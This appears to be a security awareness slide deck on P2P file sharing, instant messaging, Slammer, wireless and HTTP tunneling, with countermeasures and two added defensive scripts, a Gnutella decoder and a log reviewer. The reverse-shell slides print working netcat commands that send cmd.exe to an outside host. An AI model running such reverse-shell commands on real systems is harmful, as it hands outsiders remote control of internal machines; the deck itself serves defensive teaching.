Stuff to Worry About in Computer Security
A.K.A. “Firewall? I laugh at your puny firewall”
Analysts International
V1.0 10-0802

Introductions
• Mark Lachniet from Analysts International, Sequoia Services Group
• Senior Security Engineer and Security Services technical lead
• Former I.S. director for Holt Public Schools
• Certified Information Systems Security Professional (CISSP)
• Microsoft MCSE, Novell Master CNE, Linux LPI Certified LPIC-1, Check Point Certified CCSE, etc.

Agenda
• Peer to Peer file sharing
• Instant Messaging
• Slammer (just for fun)
• Wireless
• Reverse command shells
• HTTP Tunneling / GoToMyPC.com
• Round table – Q&A – Brainstorming

Peer to Peer File Sharing
• Several different networks and clients:
  – Aimster
  – FastTrack
  – iMesh
  – Audiogalaxy
  – MFTP
  – NeoModus
  – Gnutella
  – OpenNap

Peer to Peer File Sharing
• The most popular network by far is Gnutella
• Gnutella has many different clients including:
  – BearShare*
  – Gnucleus
  – GTK-Gnutella
  – LimeWire
  – Mactella
  – Morpheus*
  – Phex
  – Qtella
  – Shareaza*
  – XoLoX
• Different clients have different features, systems and risks

P2P File Sharing History
• Napster was the first successful and important one, but Napster made one mistake
• Napster used centralized servers that were under their control
• Hence the system could be shut down by going after Napster with legal action
• Newer systems have “master” nodes, but all they do is maintain lists of other peers out on the network
• Master nodes are replaceable – you could start your own P2P network by setting up your own master servers

Napster-Style P2P
• This wasn’t too bad, at least you knew what to block

Gnutella Style P2P
• This is *bad* for you because there is no single choke point to cut off

P2P File Share Features
• Keyword searching
• Rate limiting / Quality of Service (via bandwidth or simultaneous upload and download limits)
• Request queuing at the serving host
• Chat facilities
• Use SHA hashes of files to uniquely ID them:
  – SHA hashes are unique by file
  – IDs files that are the same but have different names
  – Allows for “swarm” downloads where parts of the same file are downloaded from multiple sources simultaneously (cool)
  – Allows for file resumption if a source is unavailable (turned off, hung up, etc.)
  – Allows for a patient person to get almost anything they can find listed

Gnutella Communications
• Uses 5 distinct types of protocol messages: ping, pong, query, query reply, and push
• Use Shareaza to get a good protocol analyzer / decoder to see them
• Ping and Pong discovery – ask who is out there, return IP address and amount of shared files
• Query and Query reply – gives search terms (keywords) and minimum bandwidth requirements. Reply gives IP address, port, speed, matching files and GUID of querier
• Querier then connects to the server and attempts to download the file (this will break if the server is behind a firewall)
• The Push message is sent if the querier cannot connect to the server to download the data

Push – Firewall Circumvention
• Sends the querier’s IP and port number and asks the file host to push the file to it – this will bypass a single firewall in the mix
• If both parties are behind a firewall you are probably safe… For now…
• How can you stop it? Use a firewall to block *all* outgoing communications
• Require a proxy server to mediate all requests outwards (Squid, MS-PROXY, Border Manager)
• It’s only a matter of time before P2P clients can tunnel within HTTP requests that are “proxy friendly”
• Can already be done with special (but thankfully complicated) HTTP tunneling software
• For Gnutella, you can block the “root” servers but an alternate could always be used

P2P File Share Security Risks
• Spyware Spyware Spyware!
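The five descriptor types from the Gnutella Communications slide, and the Push message from the Push – Firewall Circumvention slide, decoded off the wire so a network monitor can see what is being searched for and which Push messages ask an internal host to open an outbound connection. This is an added example, not code from the deck or from any Gnutella client; it assumes the Gnutella 0.4 descriptor layout (23-byte header: 16-byte GUID, 1-byte type, TTL, hops, 4-byte little-endian payload length) and constructs its own sample bytes, so the addresses and the port 6346 are made-up values.

```python
"""Gnutella 0.4 descriptor decoder (added example, not from the slides).

Walks a byte stream of Gnutella descriptors and summarizes each one, so a
monitor on the wire can see who is pinging, what is being searched for, and
which Push messages ask a file host to connect *out* to a querier (the
firewall-circumvention case on the slides). Layout is assumed from the
Gnutella 0.4 spec; the sample traffic below is constructed.
"""
import struct

HEADER_LEN = 23          # 16-byte GUID + type + TTL + hops + 4-byte LE payload length
TYPES = {0x00: "ping", 0x01: "pong", 0x40: "push", 0x80: "query", 0x81: "queryhit"}
MAX_PAYLOAD = 64 * 1024  # sanity cap on the length field (an assumption, not in the spec)


def ip_str(four_bytes):
    """Dotted quad from 4 raw bytes (Gnutella carries IPs in network byte order)."""
    return ".".join(str(b) for b in four_bytes)


def decode_payload(ptype, p):
    """Pull out the fields the slides mention for pong, query and push payloads."""
    if ptype == 0x01 and len(p) >= 14:      # pong: port, IP, #files shared, #KB shared
        port, = struct.unpack_from("<H", p, 0)
        files, kbytes = struct.unpack_from("<II", p, 6)
        return {"ip": ip_str(p[2:6]), "port": port, "files": files, "kbytes": kbytes}
    if ptype == 0x80 and len(p) >= 3:       # query: minimum speed, NUL-terminated criteria
        speed, = struct.unpack_from("<H", p, 0)
        return {"min_speed": speed, "criteria": p[2:].split(b"\0", 1)[0].decode("latin-1")}
    if ptype == 0x40 and len(p) >= 26:      # push: servent GUID, file index, IP, port
        idx, = struct.unpack_from("<I", p, 16)
        port, = struct.unpack_from("<H", p, 24)
        return {"servent": p[:16].hex(), "file_index": idx, "ip": ip_str(p[20:24]), "port": port}
    return {}


def decode_stream(data):
    """Return one dict per descriptor; stop cleanly on truncated or absurd input."""
    msgs, off = [], 0
    while off + HEADER_LEN <= len(data):
        guid = data[off:off + 16]
        ptype, ttl, hops, plen = struct.unpack_from("<BBBI", data, off + 16)
        if plen > MAX_PAYLOAD:
            msgs.append({"type": "malformed", "reason": "payload length %d too large" % plen})
            break
        payload = data[off + HEADER_LEN:off + HEADER_LEN + plen]
        if len(payload) < plen:
            msgs.append({"type": "truncated", "reason": "descriptor cut short"})
            break
        msg = {"type": TYPES.get(ptype, "unknown(0x%02x)" % ptype), "guid": guid.hex(),
               "ttl": ttl, "hops": hops}
        msg.update(decode_payload(ptype, payload))
        msgs.append(msg)
        off += HEADER_LEN + plen
    return msgs


def push_targets(msgs):
    """(ip, port) pairs that Push descriptors ask the file host to connect out to."""
    return [(m["ip"], m["port"]) for m in msgs if m["type"] == "push" and "ip" in m]


def build(ptype, payload, ttl=7, hops=0, guid=b"\x11" * 16):
    """Assemble one descriptor; used here only to construct sample traffic."""
    return guid + struct.pack("<BBBI", ptype, ttl, hops, len(payload)) + payload


# Constructed sample stream: ping, pong, query, push (addresses and port are made up).
SAMPLE = (
    build(0x00, b"")
    + build(0x01, struct.pack("<H", 6346) + bytes([10, 1, 5, 20]) + struct.pack("<II", 120, 450000))
    + build(0x80, struct.pack("<H", 56) + b"metallica\0")
    + build(0x40, b"\x22" * 16 + struct.pack("<I", 17) + bytes([203, 0, 113, 9]) + struct.pack("<H", 6346))
)

if __name__ == "__main__":
    decoded = decode_stream(SAMPLE)
    for m in decoded:
        print(m)
    print("push targets (expect an outbound connection from the file host):", push_targets(decoded))
```

The decoder deliberately trusts nothing in the header: a payload length larger than the cap, or a descriptor that runs past the end of the captured bytes, ends decoding with an explicit marker instead of an exception, which is what you want in anything fed from a network tap.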
• Usually no virus scanning is done – you need to do your own
• Spoofed servers will cough up Trojans for almost any simple query (like the Benjamin Worm)
• Sharing of more than you intended
• “Transit” sharing of naughty files has been hinted at!
• Security holes (intentional or not) in the software itself
• Program minimizes (not shuts down) when exited
• P2P specific worms (e.g. the “Gnutella Worm”)
• Content problems and liability!
• Bandwidth leeching

Future P2P Risks
• A lot of things about P2P are “dicey” but haven’t yet been exploited
• For example, the GUID is a unique identifier that is sometimes based on MAC address! (pre-Win2k, it is said)
• That means that queries can be tracked to a workstation
• A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc.)
• Great possibility for leveraging the P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov)

P2P “NG” Share Sniffer
• Operates under the creed of “who needs Napster when you have Windows”
• Scans a subnet for “open” Windows shares and creates a database of them
• These open shares are then used as the storage repositories for various types of files
• This product used to be at sharesniffer.com but is gone now. I wonder why
• This was allegedly going to be a pay service!
• Due to the lack of awareness on the part of home users, this will probably work quite well

Instant Messaging
• IM is everywhere, including my cell phone! (although I don’t use it)
• Over 81 MILLION users
• Check out: http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order to work
• Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers)

Problems with IM
• Bypasses gateway AntiVirus products
• Typically unencrypted
• Security problems in the software itself – many previous hacks, probably many more to come
• May allow remote control of machines inside the firewall
• Ability to send files, URLs, etc. to individuals
• Hard to stop at the firewall
• Hard to track, log and account for
• No robust authentication systems
• Secure IM costs $$ and may require an ongoing service contract or your own server
• May be a covered medium under CIPA????

Instant Messaging Problems – Case in Point: msgsnarf
• Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their special features!
• One feature is that it will work on a switch by using “ARP poisoning” such that even switched networks are vulnerable to sniffing
• Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information)
• This might have a “white-hat” application, actually, if you need to monitor it

IM Management Techniques
• Use an IDS to alert you to matching traffic (and then go slap the user)
• Block access to the login servers and ports (refer to Information Security magazine’s August issue for details)
• Tightly control the workstation using imaging and desktop security products
• Require the use of proxy servers (only works in some cases – disable CONNECT on the proxy)
• Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software

Slammer
• Hit in late January, 2003
• Known as Slammer or Sapphire
• Was the fastest spreading worm ever
• Took 10 minutes to cross the globe
• Doubled the # of infected systems every 8.5 seconds in the first minute (compared to Code Red, which doubled every 37 minutes)
• Took advantage of an old security bug in Microsoft SQL Server
• Especially hard hit were those with Microsoft’s MSDE – a desktop version of SQL Server

Slammer
• Many people who had patched their SQL servers with the proper patch were still hit because of MSDE
• MSDE ships with a variety of products, including versions of Visio, Microsoft Visual Studio, etc.
• Took advantage of the fact that SQL Server runs with admin privileges
• Hence attacks on SQL servers are very dangerous – if they succeed, you can run code of your choice as admin
• The entire worm fit into a single UDP packet of less than 1k!

Wireless
• If you haven’t yet heard that wireless is insecure, you have probably been living in a cave and never get news of the outside world
• Yes, wireless is insecure…. Especially anything you purchased less than 6 months ago. Newer stuff is better
• Until recently, the only security that you could get from wireless Access Points (APs) was Wired Equivalent Privacy (WEP)
• WEP comes in 64-bit and 128-bit flavors, neither of which will do you any good at all if someone really wants to get you

Wireless
• Wardriving – it’s fun, it’s cheap, and your students think it’s spiffy
• Wireless leaks – connections can be made from physical locations outside of your control by using special hardware and software
• Omnidirectional magnetic-mount antennas, directional antennas, and even Pringles cans do a pretty good job of picking up signals you never thought possible
• Not only can anyone find your network, but they can (probably) tell what your SSID is, whether you use WEP, and what vendor your equipment is from

Wireless
• Above and beyond that, modern software integrates with a GPS over a serial port to record the longitude and latitude of your AP
• When posted on the internet, your dirty laundry is aired out for all to see (*)
• Check out http://www.netstumbler.com for lots of great information
• Try it out yourself, you may be surprised
• War driving is not, in itself, illegal! However, if you ever use an AP without permission, that is over the line.

From Work to Home
9 Access Points in 15 Minutes

Wireless Security Measures
• There are a few things you can do
• Put access points on a special DMZ segment on a firewall and restrict traffic
• Require users to use a VPN client to access internal resources
• Use a modern authentication system such as 802.1X (in Windows XP) and/or LEAP
• These systems can require a successful authentication (for example to a RADIUS server) before allowing a user to associate with an access point
• Can also require MUTUAL authentication between the AP and client in addition to user authentication
• If this didn’t exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own “rogue” AP

Reverse Command Shells
• One would think that if you block all incoming access, it should be impossible to access internal systems
• This is only partially true, because it assumes that the client is honest
• With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded
• Reverse command shells, e.g. the NetCat attack, are particularly scary
• Using a utility program such as NetCat, even a Windows server can be accessed from an outside server

How Reverse Shells Work
• Imagine the above scenario.
  Lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no direct Network Address Translation, but the client has Internet access

How Reverse Shells Work
• Hacker runs NetCat in listen mode on port 8080 on lachniet.com (netcat -l -p 8080)
• Client runs NetCat with an argument of cmd.exe and directs all output to lachniet.com port 8080 (nc -e cmd.exe lachniet.com 8080)

How Reverse Shells Work
• The result – full access as the logged-in user
• To stop it – no outgoing access!
• Except by proxy server

HTTP Tunneling
• It used to be that a firewall, when properly configured, would stop clients from doing naughty things (like reverse command shells)
• Ideally we would block all outgoing access, and allow only web access through an HTTP proxy server
• This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and data, and then pass that data down to lower layers of the OSI model
• In this way, even the most paranoid countermeasures can be circumvented, including a restrictive firewall and a proxy server
• Technically speaking, it looks something like this:

HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, solid line is TCP

GoToMyPC.com
• Basically the same thing, except you are using a pay service for your HTTP tunnel termination
• The service also acts as a broker for who can connect to your PC
• Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines)
• You also get more control and presumably security through SSL, reporting, users and groups and such

HTTP Tunneling Counter-measures
• Block *all* outgoing traffic at a firewall, and require all traffic to go through a proxy server
• Use a firewall with strict RFC compliance (I heard of some reported success with Raptor/Symantec?)
• Make sure your proxy server doesn’t allow the CONNECT verb
• Configure an IDS to sense certain types of HTTP tunneling signatures (RealSecure can detect gotomypc.com traffic signatures)
• Block all known destination servers such as those from the gotomypc.com service
• Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn’t seem legit) check it out – go browse it yourself
• Log review may be your only recourse!

Q&A and Brainstorming
Mark Lachniet
Sr. Security Engineer
Analysts International
517.336.1004
mlachniet@analysts.com
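The log review that the HTTP Tunneling Counter-measures slide calls your only recourse, done as a script rather than by eye, and applied to the Slammer slides as well: an added example, not code from the deck or from any product it names. It reads constructed firewall and proxy log lines and flags (1) an internal host spraying UDP at port 1434 (the SQL Server resolution port, which the worm used, a fact not stated on the slides) toward many distinct destinations, (2) proxy clients using CONNECT to a port other than 443, which the IM Management and Counter-measures slides say to disable, and (3) a client sending almost all of its HTTP requests to one host, the GoToMyPC-style pattern the last slide describes. The iptables-like firewall line format, the Squid native access.log format, every address and host name, and the thresholds are assumptions made for the demo.

```python
"""Firewall and proxy log review (added example, not from the slides).

Heuristics, run over constructed log lines:
  1. Slammer-style spraying: an internal host sends UDP/1434 to many
     distinct destinations (1434 is the SQL Server resolution port).
  2. CONNECT abuse: a proxy client uses CONNECT to a non-443 port.
  3. Concentration: a proxy client sends most of its requests to one host,
     the polling pattern of an HTTP tunnel.
Log formats, addresses, host names and thresholds are assumptions.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# iptables-style field pairs; only the fields we need are captured.
FW_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) SPT=\d+ DPT=(?P<dpt>\d+)")


def udp1434_sprayers(lines, min_targets=3):
    """Source IP -> number of distinct UDP/1434 destinations, for sources at or over the threshold."""
    targets = defaultdict(set)
    for line in lines:
        m = FW_RE.search(line)
        if m and m["proto"] == "UDP" and m["dpt"] == "1434":
            targets[m["src"]].add(m["dst"])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}


def parse_squid(line):
    """Squid native format: time elapsed client code/status bytes method url user hier/host type."""
    f = line.split()
    if len(f) < 7:
        return None
    return {"client": f[2], "method": f[5], "url": f[6]}


def target_host(method, url):
    """Host a proxied request is for; CONNECT carries host:port rather than a URL."""
    if method == "CONNECT":
        return url.rpartition(":")[0]
    return urlsplit(url).hostname or url


def proxy_findings(lines, min_requests=20, share=0.8, allowed_connect_ports=("443",)):
    """List of (kind, client, target) for CONNECT abuse and single-host concentration."""
    findings, per_client = [], defaultdict(Counter)
    for line in lines:
        rec = parse_squid(line)
        if rec is None:
            continue
        if rec["method"] == "CONNECT" and rec["url"].rpartition(":")[2] not in allowed_connect_ports:
            findings.append(("connect", rec["client"], rec["url"]))
        per_client[rec["client"]][target_host(rec["method"], rec["url"])] += 1
    for client, hosts in per_client.items():
        total = sum(hosts.values())
        host, n = hosts.most_common(1)[0]
        if total >= min_requests and n / total >= share:
            findings.append(("concentration", client, host))
    return findings


# Constructed firewall lines: one host sprays UDP/1434, another just does DNS.
FIREWALL_LOG = [
    "Jan 25 05:30:01 fw kernel: OUT SRC=10.1.5.20 DST=198.51.100.7 PROTO=UDP SPT=1434 DPT=1434 LEN=404",
    "Jan 25 05:30:01 fw kernel: OUT SRC=10.1.5.20 DST=203.0.113.9 PROTO=UDP SPT=1434 DPT=1434 LEN=404",
    "Jan 25 05:30:01 fw kernel: OUT SRC=10.1.5.20 DST=192.0.2.44 PROTO=UDP SPT=1434 DPT=1434 LEN=404",
    "Jan 25 05:30:02 fw kernel: OUT SRC=10.1.5.20 DST=198.51.100.88 PROTO=UDP SPT=1434 DPT=1434 LEN=404",
    "Jan 25 05:30:02 fw kernel: OUT SRC=10.1.7.3 DST=198.51.100.7 PROTO=UDP SPT=3055 DPT=53 LEN=60",
]

# Constructed proxy lines: ordinary browsing, a CONNECT to port 8080, and one client polling a single host.
PROXY_LOG = [
    "1043490001.101    120 10.1.5.20 TCP_MISS/200 5120 GET http://www.example.edu/index.html - DIRECT/192.0.2.10 text/html",
    "1043490002.250     90 10.1.5.20 TCP_MISS/200 2048 GET http://news.example.org/today.html - DIRECT/192.0.2.11 text/html",
    "1043490010.500   2000 10.1.5.22 TCP_MISS/200 0 CONNECT tunnel.example.org:8080 - DIRECT/203.0.113.77 -",
] + [
    "10434900%02d.000     30 10.1.5.21 TCP_MISS/200 612 POST http://relay.example.net/poll - DIRECT/203.0.113.50 application/octet-stream" % i
    for i in range(25)
]

if __name__ == "__main__":
    print("UDP/1434 sprayers:", udp1434_sprayers(FIREWALL_LOG))
    for finding in proxy_findings(PROXY_LOG):
        print(finding)
```

The concentration check is deliberately a ratio with a minimum request count, not a raw count: a browser hitting a busy site produces many requests spread over several hosts (images, ads), while a tunnel talks to one relay and nothing else. Tune `min_requests` and `share` against a day of your own proxy logs before acting on the output, and treat a flagged host as something to go browse yourself, as the slide says.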